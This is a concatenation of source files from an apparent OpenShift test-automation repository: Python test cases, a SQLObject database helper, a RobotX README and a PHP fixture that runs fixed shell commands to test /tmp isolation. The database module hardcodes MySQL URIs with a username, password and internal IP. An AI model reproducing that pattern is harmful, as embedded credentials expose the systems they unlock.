weeks\n\n* Tutorial & Training\n ...\n\n" }, { "alpha_fraction": 0.5932294726371765, "alphanum_fraction": 0.5996776223182678, "avg_line_length": 32.23214340209961, "blob_id": "53da125f20724cdce46727cbdb4a11d7afb1c9d3", "content_id": "8cf81ea5d6b5315e6b0295b655df9fb1b0205d1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1861, "license_type": "no_license", "max_line_length": 154, "num_lines": 56, "path": "/automation/open/testmodules/RT/hot_deploy/nodejs_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 13, 2012\n\"\"\"\n\nimport rhtest\nimport common\nimport fileinput\nimport re\nfrom hot_deploy_test import HotDeployTest\n\nclass NodeJSHotDeployWithoutJenkins(HotDeployTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_name = common.getRandomString()\n self.config.application_type = common.app_types['nodejs']\n self.config.scalable = False\n self.config.jenkins_is_needed = False\n self.config.summary = \"[US2747][RT]Hot deployment support for application - without Jenkins - nodejs-0.6\"\n \n def configuration(self):\n self.log_info(\"Modifying the application to check PID\")\n self.config.file_name = \"pid.js\"\n self.info(\"Editing file '%s'...\" % 'server.js')\n try:\n for line in fileinput.input(\"./%s/server.js\" % ( self.config.application_name ), inplace = True):\n print line,\n if re.search(r'// Routes for /health, /asciimo and /', line):\n print \n print \"\\t\\tself.routes['/pid.js'] = function(req, res) {\"\n print \"\\t\\t\\tres.send(fs.readFileSync(process.env.OPENSHIFT_HOMEDIR + '/%s/run/node.pid').toString());\" % self.config.application_type\n print \"\\t\\t};\"\n print\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n self.fail(\"Configuration of the test-application must be successful\")\n finally:\n fileinput.close()\n self.deploy()\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NodeJSHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5740814208984375, "alphanum_fraction": 0.5846550464630127, "avg_line_length": 30.13580322265625, "blob_id": "b61ea449f5844e2821319f1c27f402130fb553b9", "content_id": "cb0f20712fe39f7b0c2833f09f3a5315525712f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15132, "license_type": "no_license", "max_line_length": 225, "num_lines": 486, "path": "/automation/open/lib/database.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\ndatabase support library\n\n\"\"\"\n\nfrom sqlobject import *\nfrom sqlobject.sqlbuilder import Select, func\nimport json\nimport time\nimport datetime\nglobal sqlhub\nlogdb = 'localhost'\n#logdb = 'ec2-50-17-200-67.compute-1.amazonaws.com'\n\n__all__ = ['TestResults', 'LibraAmis', 'PerfManifest', 'PerfResults',\n \n # Misc classes/functions.\n 'connect2db', 'disconnect',\n ]\nBUILD_DBURI=\"mysql://ruser:lab@%s/reports\" % logdb\n#DBURI=\"mysql://ruser:lab@%s/Openshift\" % \"localhost\" \nDBURI=\"mysql://ruser:lab@%s/Openshift\" % \"10.14.16.138\" \n\nTEST_RUN_STATUS = {'RUNNING' : 0, 'FINISHED' : 1}\nCASE_RUN_STATUS = {'IDLE':1,'PASSED':2,'FAILED':3, 'RUNNING':4, 'PAUSED':5, \n 'BLOCKED':6,'ERROR':7, 'WAIVED':8}\n\ndef connect2db(uri=DBURI):\n global sqlhub\n if not hasattr(sqlhub, \"processConnection\"):\n connection = connectionForURI(uri)\n sqlhub.processConnection = connection\n return sqlhub.processConnection\n\ndef disconnect():\n global sqlhub\n if hasattr(sqlhub, \"processConnection\"):\n conn = sqlhub.processConnection\n del sqlhub.processConnection\n\nclass TestResults(SQLObject):\n AmiID = StringCol() # AMI that the instance is based on. \n TestName = StringCol() # Name of the test that was run AMI that the instance is based on.\n StartTime = DateTimeCol() # The date and time that the test was started. \n EndTime = DateTimeCol() # The date and time that the test was completed. This is the time that the script wrote a P/F/I result into this record.\n TestbedID = StringCol() # the ip of the instance \n TestScript = StringCol() # need this?? \n #ConfigFile = StringCol() # A file pointer to the test configuration file that was used during the test.\n ResultsDataFile = StringCol() # File pointer. If a lengthy report or text file of data is produced during the test iterations, the results from all iterations are stored in a single file. NULL if none.\n User = StringCol() # Name of the user that ran the test\n Comments = StringCol() # User comments about the test\n PassFail = EnumCol(enumValues=[\"P\", \"F\", \"I\",\"A\"]) # The test PASS/FAIL result. P=PASS, F=FAIL, I=INCOMPLETE\n BuildVersion = StringCol() # DSP sw version\n RunMode = StringCol()\n TcmsTag = StringCol()\n TcmsTestCaseId = IntCol()\n TcmsTestCaseRunId = IntCol()\n TcmsTestRunId = IntCol()\n\nclass LibraAmis(SQLObject):\n ami_id = StringCol()\n #provider = ('Provider') # \n build_version = StringCol() # ami ID\n ami_time = DateTimeCol() # when the ami was created. \n\nclass PerfManifest(SQLObject):\n action = StringCol()\n cartridge = StringCol()\n\nclass PerfResults(SQLObject):\n TestResultsID = IntCol() #ForeignKey(\"TestResults\")\n ActionID = IntCol() #ForeignKey(\"PerfManifest\")\n ActionTime = FloatCol() # seconds the action took\n GearSize = IntCol()\n\nclass TcmsTags(SQLObject):\n plan_id = IntCol()\n tcms_id = IntCol()\n name = StringCol()\n tc_count = IntCol()\n tag_json = BLOBCol()\n\nclass TcmsTestcases(SQLObject):\n plan_id = IntCol()\n case_id = IntCol()\n case_json = BLOBCol() # dict is reprsented as JSON \n\nclass TcmsTestRun(SQLObject):\n plan = IntCol()\n #errata_id = IntCol()\n manager = IntCol()\n summary = StringCol()\n product = IntCol()\n product_version = IntCol()\n default_tester = IntCol()\n plan_text_version = IntCol()\n estimated_time = StringCol()\n notes = StringCol()\n status = IntCol()\n case_list = StringCol()\n tag_list = StringCol()\n migrated = IntCol() # default to 0, migrated = 1 if user migrated the result back into tcms after tcms server is back online\n launched_time = DateTimeCol()\n\nclass TcmsTestcaseRun(SQLObject):\n run = IntCol()\n case_id = IntCol()\n build = IntCol()\n assignee = IntCol()\n case_run_status = IntCol()\n case_text_version = IntCol()\n notes = StringCol()\n sortkey = IntCol()\n migrated = IntCol() # default to 0, migrated = 1 if user migrated the result back into tcms after tcms server is back online\n\n\n\n\n\nclass ConfigDefaults(SQLObject):\n name = StringCol()\n value = StringCol()\n\n###### helper function\n\ndef ami_in_db(ami_id):\n \"\"\"\n return true if the ami_id exists in table already, false otherwise.\n\n \"\"\"\n connect2db()\n tbl = LibraAmis\n sql = tbl.select(tbl.q.ami_id==ami_id)\n res = list(sql)\n if len(res) > 0:\n return True\n else:\n return False\n\ndef get_ami_info(ami_id):\n connect2db()\n tbl = LibraAmis\n sql = tbl.select(tbl.q.ami_id==ami_id)\n res = list(sql)\n if len(res) > 0:\n return res[0]\n else:\n return None\n\ndef get_stg_ami(pattern='devenv-stage_'):\n connect2db()\n tbl = LibraAmis\n sql = tbl.select(tbl.q.build_version.startswith(pattern)).orderBy('ami_time').reversed()\n res = list(sql)[0]\n return res\n\"\"\"\ndef get_perf_action_id(action):\n connect2db()\n tbl = PerfManifest\n sql = tbl.select(tbl.q.action==action)\n res = list(sql)\n if (len(res) == 0):\n # nothing found, insert it\n res = PerfManifest(action=action)\n return res[0]\n else:\n return res[0]\n\"\"\"\ndef get_perf_action_id(action, cartridge=None):\n connect2db()\n tbl = PerfManifest\n sql = tbl.select(AND(tbl.q.action==action, tbl.q.cartridge==cartridge))\n res = list(sql)\n if (len(res) == 0):\n res = PerfManifest(action=action, cartridge=cartridge)\n print #################\n return res.id\n else:\n return res[0].id\n \ndef record_results(resid, res_dict):\n #self.info(\"xx\", 1)\n for k, v in res_dict.items():\n # first check to see if the performance action exists\n action = get_perf_action_id(k)\n res = PerfResults(TestResultsID=resid, ActionID=action.id, \n ActionTime=v[0], GearSize=v[1])\n print res.id\n\ndef get_defaults():\n connect2db()\n tbl = ConfigDefaults\n sql = tbl.select()\n res_list = list(sql)\n configs = {}\n for res in res_list:\n configs[res.name] = res.value\n\n return configs\n\ndef populate_tcms_testcases_by_tag(tcms_obj, tag):\n \"\"\" \n save the json tag into mysql \n\n \"\"\"\n connect2db()\n tbl = TcmsTags\n test_plan_id = tcms_obj.plan_id\n testcase_json, tc_count = tcms_obj.dump_testcases_to_json_by_tag(tag['name'])\n # check to see if that exists in DB, insert it if not\n sql = tbl.select(AND(tbl.q.name==tag['name'], tbl.q.tcms_id==tag['id']))\n res = list(sql)\n if len(res):\n # exist already just update the json field and count\n res[0].tag_json = testcase_json\n res[0].tc_count = tc_count \n else:\n print \"Row does not exist...adding...\"\n TcmsTags(\n plan_id=test_plan_id,\n tcms_id=tag['id'],\n name = tag['name'],\n tc_count = tc_count,\n tag_json = testcase_json\n )\n \ndef populate_tcms_testcases(testcase_dict, plan_id=4962):\n connect2db()\n tbl = TcmsTestcases\n testcase_json = json.dumps(testcase_dict)\n sql = tbl.select(tbl.q.case_id == testcase_dict['case_id'])\n res = list(sql)\n if len(res):\n res[0].case_json = testcase_json\n else:\n res = tbl(plan_id=plan_id,\n case_id=testcase_dict['case_id'],\n case_json = testcase_json)\n return res\n \n \ndef get_testcases_json_by_tag(tag_name):\n \"\"\"\n return the testcases represented in JSON given a tag_name\n \"\"\"\n connect2db()\n tbl = TcmsTags\n sql = tbl.select(tbl.q.name==tag_name)\n res = list(sql)\n if len(res):\n return res[0].tag_json\n else:\n print \"No information found in mysql for tag '%s'\" % tag_name\n return None\n\ndef extract_testcase_ids_from_json(json_data, params=None):\n \"\"\" given a json formated testcase data, extract all of the testcase ids\n user can filter out cases by providing the params with parameters to filter\n params = {'is_automated': 1, 'case_status' : 'CONFIRMED'}\n \"\"\"\n testcase_data = json.loads(json_data)\n tc_id_list = []\n for testcase in testcase_data:\n if params:\n match = 1\n for param in params.items():\n if testcase[param[0]] != param[1]:\n match = 0\n break\n if match:\n tc_id_list.append(testcase['case_id'])\n else:\n tc_id_list.append(testcase['case_id'])\n return tc_id_list\n\ndef get_testcase_ids_by_tag(tag_names, params=None):\n \"\"\" params contains parameters user wish to return testcase to be filtered\n by: for example... params = {'is_automated': 1, 'case_status' : 'CONFIRMED'}\n will only return testscases that are marked automated and confirmed \n \"\"\"\n tc_list = []\n for tag_name in tag_names:\n json_data = get_testcases_json_by_tag(tag_name)\n tc_list = tc_list + extract_testcase_ids_from_json(json_data, params)\n return tc_list\n\ndef get_testcase_by_id(case_id):\n \n connect2db()\n tbl = TcmsTestcases\n sql = tbl.select(tbl.q.case_id == case_id)\n res = list(sql)\n if len(res):\n tc_dict = json.loads(res[0].case_json)\n \n return tc_dict\n else:\n print \"No testcase id '%s' found in database\" % case_id\n return None\n \ndef get_all_tcms_testcases():\n connect2db()\n testcases = []\n tbl = TcmsTestcases\n sql = tbl.select()\n results = list(sql)\n for res in results:\n test = {}\n\n details = json.loads(res.case_json)\n test['id'] = res.id\n test['details'] = details\n testcases.append(test)\n return testcases\n\ndef get_testcase_run_id_from_db(test_run_id, tcms_testcase_id):\n \"\"\"\n given a test_run id and tcms_testcase_id, return the testcase_run id in db\n \"\"\"\n connect2db()\n tbl = TcmsTestcaseRun\n sql = tbl.select(AND(tbl.q.case_id==tcms_testcase_id, tbl.q.run==test_run_id))\n results = list(sql)\n if results:\n return results[0].id\n else:\n return None\n\n\ndef create_tcms_testrun(params = None):\n \"\"\"\n create an new entry into the mysql database for a testrun that will eventually\n store back into TCMS once the server is back-online\n \"\"\"\n connect2db()\n tbl = TcmsTestRun\n launched_time = datetime.datetime.fromtimestamp(time.time())\n default_params= {\n 'plan' : 4962,\n 'manager' : 2351,\n\n 'summary' : 'Automated summary',\n 'product' : 292,\n 'product_version' : 1212,\n 'default_tester' : 2955,\n 'plan_text_version' : 1,\n 'estimated_time' : '00:00:00',\n 'notes' : 'automated notes',\n 'status' : 0, \n 'case_list' : None,\n 'tag_list' : None,\n 'migrated' : 0,\n 'launched_time': launched_time,\n }\n\n if params is None:\n params = default_params\n\n else:\n for k, v in params.items():\n default_params[k] = params[k]\n\n params = default_params\n\n res = tbl(\n plan = params['plan'],\n manager = params['manager'],\n summary = params['summary'],\n product = params['product'],\n product_version = params['product_version'],\n default_tester = params['default_tester'],\n plan_text_version = params['plan_text_version'],\n estimated_time = params['estimated_time'],\n notes = params['notes'],\n status = params['status'],\n case_list = params['case_list'],\n tag_list = params['tag_list'],\n migrated = params['migrated'],\n launched_time=params['launched_time'],\n )\n \n return res\n\ndef update_testrun(testrun_id, params):\n tbl = connect2db()\n tbl = TcmsTestRun\n res = tbl.select(tbl.q.id == testrun_id)\n if res:\n for k, v in params.items():\n res[0].__setattr__(k, v)\n\n \n return res\n\ndef create_tcms_testcase_run(params = None):\n \"\"\"\n create an new entry into the mysql database for a testrun that will eventually\n store back into TCMS once the server is back-online\n \"\"\"\n connect2db()\n tbl = TcmsTestcaseRun\n default_params= {\n 'assignee' : 2351,\n 'case_run_status' : 1, # IDLE\n 'case_text_version' : 1,\n 'notes' : 'TBD',\n 'sortkey': 0,\n 'migrated' : 0,\n 'build': 1770,\n }\n\n if params is None:\n params = default_params\n\n else:\n for k, v in params.items():\n default_params[k] = params[k]\n\n params = default_params\n\n res = tbl(\n run = params['run'],\n case_id = params['case_id'],\n build = params['build'],\n assignee = params['assignee'],\n case_run_status = params['case_run_status'],\n case_text_version = params['case_text_version'],\n notes = params['notes'],\n sortkey = params['sortkey'],\n migrated = params['migrated'])\n \n return res\n\ndef update_testcase_run(testcase_run_id, params):\n tbl = connect2db()\n tbl = TcmsTestcaseRun\n res = tbl.select(tbl.q.id == testcase_run_id)\n if res:\n for k, v in params.items():\n res[0].__setattr__(k, v)\n return res\n\ndef update_testcaserun_status(test_run_id, tcms_testcase_id, status):\n run_status = CASE_RUN_STATUS[status]\n params = {'case_run_status': run_status}\n db_testcase_run_id = get_testcase_run_id_from_db(test_run_id, tcms_testcase_id)\n res = update_testcase_run(db_testcase_run_id, params)\n return res\n\ndef get_latest_test_result():\n tbl = connect2db()\n tbl = TestResults\n id_count = tbl.select().reversed().count()\n res = tbl.select(tbl.q.id==id_count)[0]\n return res\n\n\ndef _test():\n cart_types = ['php-5.3', 'ruby-1.8']\n domain_action = ['domain_create', 'domain_', 'domain_delete']\n app_action = ['app_start', 'app_stop', 'app_reload', 'app_restart']\n \n for cart in cart_types:\n for action in app_action:\n id = get_perf_action_id(action, cart)\n print \"ID: %s\" % id\n \nif __name__ == '__main__':\n #_test()\n\n #val = get_defaults()\n #val = get_stg_ami()\n ##res_dict = {'create_domain': 4.3, 'delete_domain': 3.1}\n #res = get_testcase_by_id(122349)\n #update_tcms_testrun(18, {'status': 0})\n #res = create_tcms_testcase_run({'run': 3, 'case_id': 122349})\n #res = create_tcms_testrun({'notes': \"This is a test\"})\n ##record_results(50, res_dict)\n #res = get_testcases_json_by_tag('origin')\n #params = {'is_automated': 1, 'case_status': 'CONFIRMED'}\n #res = get_testcase_ids_by_tag([\"origin\"], params=params)\n #get_testcase_run_id_from_db(21, 122166)\n get_test_result_status()\n self.info(\"xxx\", 1)\n pass\n" }, { "alpha_fraction": 0.5990903377532959, "alphanum_fraction": 0.6231319308280945, "avg_line_length": 23.80645179748535, "blob_id": "29a503dfb1d252ab24a22fba6a86e006d9acb2ea", "content_id": "56dae7611fcc9c80cba12c098af4723cd1fce906", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1539, "license_type": "no_license", "max_line_length": 86, "num_lines": 62, "path": "/automation/open/testmodules/UI/web/case_135712.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_135712.py\n# Date: 2012/07/24 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Change_password_invalid(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Change password using invalid new password\n web.go_to_account() \n web.click_element_by_xpath('''//section/div/div/a''')\n time.sleep(5)\n web.input_by_id('web_user_old_password',web.config.OPENSHIFT_user_passwd)\n web.input_by_id('web_user_password','ss')\n web.input_by_id('web_user_password_confirmation','ss')\n web.click_element_by_xpath('''//form[@id='new_web_user']/fieldset[2]/input''')\n time.sleep(5)\n web.assert_text_equal_by_xpath('''Passwords must be at least 6 characters''',\n '''//div[@id='web_user_password_input']/div/p''') \n\n self.tearDown()\n\n return self.passed(\"Case 135712 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Change_password_invalid)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_135712.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6829954981803894, "alphanum_fraction": 0.6829954981803894, "avg_line_length": 23.328767776489258, "blob_id": "0abef7611d02d3f763c24527879d418d9e2d0d27", "content_id": "be8a57ebf8f29b4e395e65d906d7df98ea46df1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1776, "license_type": "no_license", "max_line_length": 204, "num_lines": 73, "path": "/README.rst", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "RobotX\n======\n\nInstructions\n------------\n\nThe RobotX is a tool set for automation development with `Robot Framework`_.\n\nIt includes the following tools:\n\n- Runner\n- Generator\n- Debugger\n- Checker\n- Expander\n\nInstallation\n------------\n\n.. code:: bash\n\n $ pip install robotx\n or\n $ easy_install robotx\n\n\nUsage\n-----\n\n`RobotX Usage Doc`_\n\nBuild & Config Jenkins\n----------------------\n\n`Build Config Jenkins`_\n\n\nRobot Framework Best Practices\n------------------------------\n\n`Robot Framework Best Practice`_\n\nTest Case Management System\n---------------------------\n\nDefault TCMS Client \n~~~~~~~~~~~~~~~~~~~\n\nCurrently, RobotX uses `Nitrate`_ as default TCMS(Test Case Management System). If your TCMS is not Nitrate(such as TestLink), you need write a new client and replace the `default TCMS client of RobotX`_.\n\nConfigure TCMS Client \n~~~~~~~~~~~~~~~~~~~~~\n\n- Copy `tcms config`_ to /etc/, and name it as tcms.conf.\n\n- Open tcms.conf, and change all values to yours.\n\nComing Soon\n-----------\n\n- Create Message Queue for improving the efficiency of RobotX communicate with TCMS.\n\n- Add the mechanism of parallel execution automated cases on multiple machine nodes at one time.\n\n\n\n.. _Robot Framework: http://robotframework.org/\n.. _RobotX Usage Doc: https://github.com/idumpling/robotx/blob/master/docs/USAGE.md\n.. _Build Config Jenkins: https://github.com/idumpling/robotx/blob/master/docs/JENKINS_CONFIG.md\n.. _Robot Framework Best Practice: https://github.com/idumpling/robotx/blob/master/docs/ROBOT_BEST_PRACTICE.md\n.. _Nitrate: https://fedorahosted.org/nitrate/\n.. _default TCMS client of RobotX: https://github.com/idumpling/robotx/blob/master/robotx/core/nitrateclient.py\n.. _tcms config: https://github.com/idumpling/robotx/blob/master/robotx/conf/tcms.conf\n" }, { "alpha_fraction": 0.614130437374115, "alphanum_fraction": 0.6206521987915039, "avg_line_length": 34.9296875, "blob_id": "a5fd9016f7f3557490818813f9c1838a7756211a", "content_id": "c2ebf15352028b1b1898331ce154a37680bbe689", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4600, "license_type": "no_license", "max_line_length": 130, "num_lines": 128, "path": "/automation/open/testmodules/RT/admin/move_app_between_nodes_within_district.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: move_app_between_nodes_within_district.py\n# Date: 2012/08/31 16:17\n# Author: [email protected]\n#\n\nimport common\nimport rhtest\nimport OSConf\nimport re\n\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = [\"DEV\"]\n\n def initialize(self):\n self.info(\"[US2102] Move scalable application with postgresql embeded between nodes within one district\")\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'php'\n try:\n self.db_variant = self.config.tcms_arguments['db_variant']\n except:\n self.db_variant = 'postgresql'\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.info(\"DB VARIANT: %s\"%self.db_variant)\n self.info(\"SCALABLE: %s\"%self.scalable)\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.getRandomString(10)\n self.app_type = common.app_types[self.test_variant]\n self.cart_type = common.cartridge_types[self.db_variant]\n self.district_name=common.getRandomString(10)\n self.district_created=False\n common.env_setup()\n\n\n def finalize(self):\n pass\n\n\nclass MoveAppBetweenNodesWithinDistrict(OpenShiftTest):\n def create_district(self):\n if self.district_created:\n return\n self.info(\"Create a district\")\n (ret, output) = common.create_district(self.district_name)\n self.assert_equal(ret, 0, \"Unable to create a district\")\n self.district_created=True\n\n def test_method(self):\n msetup = common.setup_multi_node_env(self.district_name)\n\n self.assert_true((len(msetup['nodes'])>=2), \"Missing multi node environment!\")\n self.info(\"Found %s connected nodes\"%len(msetup['nodes']))\n\n ret = common.set_max_gears(self.user_email, common.DEV_MAX_GEARS)\n #self.assert_equal(ret, 0, \"Unable set max_gears\")\n\n if self.scalable:\n ret = common.create_scalable_app(self.app_name, self.app_type, clone_repo=False)\n else:\n ret = common.create_app(self.app_name, self.app_type, clone_repo=False)\n self.assert_equal(ret, 0, \"Unable to create the app\")\n\n ret = common.embed(self.app_name, 'add-%s'%self.cart_type)\n self.assert_equal(ret, 0, \"Unable to embed the app by %s\"%self.db_variant)\n\n #app_uuid=OSConf.get_app_uuid(self.app_name)\n app_url=OSConf.get_app_url(self.app_name) #node\n (gear_groups, gear_count) = self.config.rest_api.get_gears(self.app_name)\n\n gear_to_move = None\n for gear_group in gear_groups:\n for cart in gear_group['cartridges']:\n if cart['name'].find('%s' % self.db_variant) != -1:\n gear_to_move = gear_group['gears'][0]['id']\n self.assert_true((gear_to_move is not None), \"Unable to find gear of %s\"%self.db_variant)\n self.info(\"Gear of %s\"%gear_to_move)\n district_of_moved_gear = common.get_district_of_gear(gear_to_move)\n node_of_moved_gear = common.get_node_of_gear(gear_to_move)\n self.assert_true((node_of_moved_gear is not None), \"Unable to find server_identity per gear[%s]\"%gear_to_move)\n self.info(\"Finding available nodes for possible move gear[%s] within district[%s]\"%(gear_to_move, district_of_moved_gear))\n node_to_move = None\n\n for n in common.get_nodes_of_district(district_of_moved_gear):\n if n == node_of_moved_gear:\n continue\n else:\n node_to_move = n\n break\n\n app_url_private_ip = common.get_private_ip(app_url)\n self.info(\"app[%s] -> node[%s]\"%(app_url,app_url_private_ip))\n self.info(\"Node to move: %s\"%node_to_move)\n if node_to_move:\n ret = common.move_gear_between_nodes(gear_to_move, node_to_move)\n self.assert_equal(ret, 0, \"Unable to move gear.\")\n else:\n return self.abort(\"Unable to find a free node to move in withing district[%s].\"%district_of_moved_gear)\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MoveAppBetweenNodesWithinDistrict)\n return suite\n\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of move_app_between_nodes_within_district.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6354514956474304, "alphanum_fraction": 0.6421404480934143, "avg_line_length": 32.977272033691406, "blob_id": "d284df1918d4eabf647c8c5d28a268c032a7c046", "content_id": "ccd4dbf34c6d8f28af5d3c5d5a9deb7af6fa033c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1495, "license_type": "no_license", "max_line_length": 155, "num_lines": 44, "path": "/automation/open/testmodules/RT/hot_deploy/perl_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nSept 26, 2012\n\n\n\"\"\"\nimport rhtest\nimport common\nfrom hot_deploy_test import HotDeployTest\n\nclass PerlHotDeployWithoutJenkins(HotDeployTest):\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_name = common.getRandomString()\n self.config.application_type = common.app_types['perl']\n self.config.scalable = False\n self.config.jenkins_is_needed = False\n self.config.summary = \"[US2309] Hot deployment support for non-scaling Perl app - without Jenkins\"\n \n def configuration(self):\n self.log_info(\"Creating the application to check PID\")\n self.config.file_name = \"pid.pl\"\n self.info(\"Editing file '%s'...\" % self.config.file_name)\n perl_file = open(\"./%s/perl/%s\" % (self.config.application_name, self.config.file_name), \"w\")\n perl_file.write('#!/usr/bin/perl\\n')\n perl_file.write('print \"Content-type: text/plain\\\\r\\\\n\\\\r\\\\n\";\\n')\n perl_file.write('open FILE, \"<\" . $ENV{\"OPENSHIFT_HOMEDIR\"} . \"/%s/run/httpd.pid\" or die \"Cannot open the file\";\\n' % self.config.application_type)\n perl_file.write('while ( <FILE> ) { print };')\n perl_file.close()\n self.deploy()\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PerlHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5287356376647949, "alphanum_fraction": 0.5673981308937073, "avg_line_length": 24.864864349365234, "blob_id": "590fbf7eeecf570ece2b97f83d988a7725eaec4f", "content_id": "83e699741255527fd101f76a3262668fbaa82972", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 957, "license_type": "no_license", "max_line_length": 119, "num_lines": 37, "path": "/automation/open/testmodules/RT/security/data/polyinstantiation_tmp_dir_index.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\necho \"Welcome~~~~~~~\\n\";\necho \"###Test Case###: Security - Polyinstantiation of /tmp and /var/tmp for new application by using pam_namespace\\n\";\nif(!empty($_GET[\"action\"])) {\n $command1 = \"touch /tmp/php_tmp_test 2>&1\";\n echo \"Command 1: \".$command1.\"\\n\";\n passthru($command1, $ret1);\n\n $command2 = \"touch /var/tmp/php_var_tmp_test 2>&1\";\n echo \"Command 2: \".$command2.\"\\n\";\n passthru($command2, $ret2);\n\n $command = \"ls -l /tmp 2>&1\";\n echo \"Command: \".$command.\"\\n\";\n passthru($command, $ret_tmp);\n\n if($ret1 == 0 && $ret2 == 0){\n echo \"RESULT=0\\n\";\n } else {\n echo \"RESULT=1\\n\";\n }\n} else {\n $command1 = \"ls -l /tmp/php_tmp_test 2>&1 && ls -l /var/tmp/php_var_tmp_test 2>&1\";\n echo \"Command 1: \".$command1.\"\\n\";\n passthru($command1, $ret1); \n\n $command = \"ls -l /tmp/ 2>&1\";\n echo \"Command: \".$command.\"\\n\";\n passthru($command, $ret_tmp);\n\n if($ret1 == 0){\n echo \"RESULT=0\\n\";\n } else {\n echo \"RESULT=1\\n\";\n }\n}\n?>\n" }, { "alpha_fraction": 0.5179256200790405, "alphanum_fraction": 0.5233370661735535, "avg_line_length": 38.9549560546875, "blob_id": "78608a657d828ef13468c6c937645347680bcae8", "content_id": "115b0af5a6d09660c240d9d03e02ad994e10a135", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4435, "license_type": "no_license", "max_line_length": 165, "num_lines": 111, "path": "/automation/open/testmodules/RT/client/specify_conf_file.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport common, OSConf\nimport rhtest\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.domain_name = common.get_domain_name()\n self.test_rhlogin = \"[email protected]\"\n common.env_setup()\n self.conf_file_path = \"./my_express.conf\"\n self.ssh_key_path = \"%s/%s\" %(os.getcwd(), common.getRandomString(10))\n self.info(\"Add -c option to client tools to specify openshift configuration file\")\n\n def finalize(self):\n try:\n common.command_get_status(\"rm -f %s %s %s.pub\" %(self.conf_file_path, self.ssh_key_path, self.ssh_key_path))\n common.update_sshkey()\n except Exception as e:\n self.error(\"ERROR in finalize(): %s\"%str(e))\n\n\nclass SpecifyConfFile(OpenShiftTest):\n def test_method(self):\n self.add_step(\"Get the previous ssh key\", OSConf.get_sshkey)\n\n self.add_step(\"Setup config file (instead of rhc setup)\",\n '''echo -e \"libra_server=%s\\ndefault_rhlogin=%s\" > %s ''',\n function_parameters = [ self.get_instance_ip(),\n self.user_email, \n self.conf_file_path],\n expect_return=0)\n\n self.add_step(\"Check config file to test if default rhlogin is written\",\n \"cat %s\" %(self.conf_file_path),\n expect_str = [common.raw_str('default_rhlogin=%s' %(self.user_email))],\n expect_return = 0,\n expect_description = \"The file should contain `default_rhlogin` entry\")\n\n self.add_step(\"Change the default rhlogin in config file to %s\" %(self.test_rhlogin),\n \"echo 'default_rhlogin=%s' >%s\" %(self.test_rhlogin, self.conf_file_path),\n expect_return=0)\n\n self.add_step(\"Generate new ssh key file\",\n \"ssh-keygen -t rsa -f %s -N ''\" %(self.ssh_key_path),\n expect_return = 0)\n\n self.add_step(\"Modify %s to use the new ssh key\" %(self.conf_file_path),\n \"echo 